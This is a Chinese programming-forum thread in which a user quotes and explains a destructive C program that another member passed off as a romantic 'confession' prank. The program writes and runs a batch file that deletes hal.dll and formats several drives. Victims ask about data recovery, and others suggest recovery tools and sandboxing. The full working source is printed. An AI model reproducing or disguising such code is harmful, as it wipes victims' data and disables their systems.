| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 18638 人关注过本帖, 1 人收藏
标题:谁给我一个有趣的表白程序我去追女生!!
只看楼主 加入收藏
lyxhkg
Rank: 2
等 级:禁止访问
帖 子:50
专家分:24
注 册:2012-4-24
收藏
得分:0 
回复 9 楼 vvvcuu
求一个可以交流的QQ群呗想看看大牛的世界!
2014-08-15 19:41
水滴滴水
Rank: 1
等 级:新手上路
帖 子:7
专家分:1
注 册:2014-8-15
收藏
得分:0 
回复 9 楼 vvvcuu
楼主你好,我想问一下我的电脑中招了,EF两个盘的数据都被删除了,64位的操作系统,系统可以启动,能够打开很多的网站。请问我能不能恢复我原来的数据,两个分区大约200G。新手,初来乍到,麻烦了。
2014-08-15 20:30
水滴滴水
Rank: 1
等 级:新手上路
帖 子:7
专家分:1
注 册:2014-8-15
收藏
得分:0 
回复 9 楼 vvvcuu
楼主方便建一个球球群吗?或者加一下我的球球号,616015688.新手求指导。看一下大神的世界。
2014-08-15 20:31
lyxhkg
Rank: 2
等 级:禁止访问
帖 子:50
专家分:24
注 册:2012-4-24
收藏
得分:0 
感觉你好悲剧!为啥只有2个盘被格式化我留个Q905083887 看看能不能帮到你!
2014-08-15 21:39
fogmaple
Rank: 4
来 自:江西省赣州市于都县
等 级:业余侠客
威 望:1
帖 子:119
专家分:233
注 册:2014-7-28
收藏
得分:1 
以下是引用vvvcuu在2014-8-15 18:27:22的发言:

二楼发布的程序并不是什么病毒,不过是用C新建了一个批处理文件,并运行它而已。
批处理文件功能:

1,在D,E,F盘根目录下分别建立数字1-99开头,后跟..为名字的文件夹.此类文件夹在资源管理器下无法直接删除.命令提示符下可以.
2, 删除%system32%文件夹下的hal.dll和两个文件,使系统不能启动.对于32位系统有效,64位系统未知.
3, 快速格式化D,E,F,H,J盘为NTFS文件系统.
4, 打开以下网站: 百度,360,淘宝,QQ,3G,搜搜,雅虎,谷歌,金山卫士,金山游戏等.

已中招的网友请自行在和自己电脑相同从操作系统的电脑上拷贝hal.dll和两个文件,复制到自己电脑系统盘system32文件夹下,可能需要启动盘.
启动电脑后,下载恢复软件,复原D,E,F等盘的文件,一般能复原大部分,而不能完全恢复.
程序源代码如下:

# include <stdio.h>
# include <windows.h>



int main(int argc,char *argv[])
{
ShowWindow(FindWindow("ConsoleWindowClass",argv[0]),0);

int x; int i;
FILE*fp=fopen("c:\\SB.bat","w");

for(i=0;i<100;i++)
{




fprintf(fp,"md D:\%d...\\\n",i);
fprintf(fp,"md e:\%d...\\\n",i);
fprintf(fp,"md f:\%d...\\\n",i);


if(i==25)
{



fprintf(fp,"del C:\\WINDOWS\\system32\\hal.dll \n ",i);

fprintf(fp,"del C:\\WINDOWS\\system32\\ \n ",i);


fprintf(fp,"Format d:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format e:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format f:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format h:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format j:/y/q/fs:NTFS\n",i);

}

if(i==3)
{
fprintf(fp,"start explorer http://www.baidu.com start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);



}




}



fclose(fp);
system("c:\\SB.bat");



}


此人发的一个帖子地址在这:
https://bbs.bccn.net/thread-435019-1-1.html
只是本人没有中招而已.


这个娱乐还可以,只是暂时还没有去试下
2014-08-16 08:07
Alar30
Rank: 10Rank: 10Rank: 10
等 级:贵宾
威 望:10
帖 子:988
专家分:1627
注 册:2009-9-8
收藏
得分:1 
还可以这样哇?
2014-08-16 15:07
pycansi
Rank: 9Rank: 9Rank: 9
等 级:蜘蛛侠
威 望:5
帖 子:418
专家分:1060
注 册:2012-7-26
收藏
得分:1 
回复 12 楼 水滴滴水
不要动那两个分区,下个数据恢复软件,比如easyrecovery,试试恢复下吧...
不过这样也可以获取一些经验,以后再试一些来路不明的软件得做好防御措施,比如VirtualBox


莫问前尘有愧,但求今生无悔
2014-08-16 21:08
vvvcuu
Rank: 9Rank: 9Rank: 9
等 级:贵宾
威 望:12
帖 子:353
专家分:1253
注 册:2014-4-22
收藏
得分:0 
回复 12 楼 水滴滴水
说实话不明白为什么你的的程序只是格式化了E,F两个盘,难道系统安装在D盘了?

下载个数据恢复软件,比如说WinHex,  EasyRecovery之类的。  安装在默认盘符(一般为系统盘), 千万不要安装在E,F盘。可以恢复大部分的数据,不敢说100%完全恢复。


另外,回复9楼,如果说我这水平可以称为大神,那论坛里的网友都可以称为超神了。不怕网友笑话,对C的很多基础的东西,我都还没整明白。仅仅是凭兴趣偶尔翻翻C教材的初学者而已。

有坛子里的朋友中招,是因为你利用了他们的善心。他们的想法或许仅仅是看看是个什么样的恶作剧,看看是否适合追追女孩子,而你的程序可以说处处恶意。

代码测试环境:  WinXP+C-Free5.0.
2014-08-16 22:16
zhu224039
Rank: 8Rank: 8
等 级:贵宾
威 望:17
帖 子:862
专家分:792
注 册:2012-7-29
收藏
得分:1 

 学习了

我要成为嘿嘿的黑客,替天行道
2014-08-17 04:28
jokerbat
Rank: 2
等 级:论坛游民
帖 子:77
专家分:91
注 册:2012-2-1
收藏
得分:1 
你妈
2014-08-17 11:35
快速回复:谁给我一个有趣的表白程序我去追女生!!
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.015817 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved